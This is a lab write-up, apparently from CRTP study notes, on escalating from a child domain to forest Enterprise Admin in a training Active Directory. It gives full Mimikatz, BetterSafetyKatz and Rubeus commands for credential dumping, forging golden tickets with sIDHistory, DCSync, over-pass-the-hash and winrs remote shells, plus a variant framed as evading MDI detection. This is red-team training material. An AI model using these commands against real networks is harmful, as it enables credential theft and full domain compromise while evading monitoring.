Using KRBTGT Hash

We abuse sIDhistory again. First, we dump the credentials and obtain krbtgt of dcorp-dc.

Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

We can forge the inter-realm TGT for Administrator and inject it.

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

In the above command, the mimkatz option "/sids" is forcefully setting the sIDHistory for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group.

We can now access mcorp:

winrs -r:mcorp-dc.moneycorp.local cmd

On any machine of the current domain

Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'

We can now run commands on the remote machine

ls \\mcorp-dc.moneycorp.local.kirbi\c$

gwmi -class win32_operatingsystem -ComputerName mcorp-dc.moneycorp.local

If you can't access shell on the remote system with winrs, in case you get an error as shown in the screen shot below, here is what to do to get a shell 🤟 (DCsync)

Run the dcsync attack against the krbtgt hash of the forest root

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\administrator /domain:moneycorp.local" "exit"

Now use over-passthehash to start a process as the administrator of moneycorp.local of this domain we want the request to be sent to

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt

You should now have a new process running as domain administrator of mcorp-dc, run the winrs command again and you should have shell access

winrs -r:mcorp-dc cmd

Avoid suspicious logs by using Domain Controllers group (Bypass MDI Detection) Note: /user:dcorp-dc$ used to work earlier (till April 2023) but now we need to user /user:Administrator

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden -dc$ /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"

Domain SID's -:

S-1-5-21-2578538781-2508153159-3419410681-516 - Domain Controllers
S-1-5-9 - Enterprise Domain Controllers

PreviousCRTP Lab 18 NextCRTP Lab 19

Last updated 10 months ago

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"

C:\Windows\system32>C:\AD\Tools\Rubeus.exe asktgt /user:moneycorp.local\administrator /domain:moneycorp.local /dc:mcorp-dc.moneycorp.local /aes256:a85958da138b6b0cea2ec07d3cb57b76fdbd6886938c0250bb5873e2b32371a0 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt

C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden -dc$ /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /groups:516 /sids:S-1-5-21-280534878-1496970234-700767426-516,S-1-5-9 /krbtgt:4e9815869d2090ccfca61c1fe0d23986 /ptt" "exit"